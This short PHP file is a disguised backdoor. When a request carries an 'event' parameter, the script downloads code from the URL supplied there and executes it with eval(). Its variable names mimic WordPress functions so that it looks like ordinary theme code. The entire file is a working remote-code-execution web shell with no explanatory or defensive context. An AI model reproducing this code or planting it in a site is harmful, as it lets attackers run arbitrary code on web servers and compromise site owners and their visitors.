<?php

if (isset($_GET['event'])) {
    $register_sidebar_tb = $_GET['event'];
    if ($have_comments_vhv = curl_init()) {
        curl_setopt($have_comments_vhv, CURLOPT_URL, $register_sidebar_tb);
        curl_setopt($have_comments_vhv, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($have_comments_vhv));
        curl_close($have_comments_vhv);
        exit;
    }
}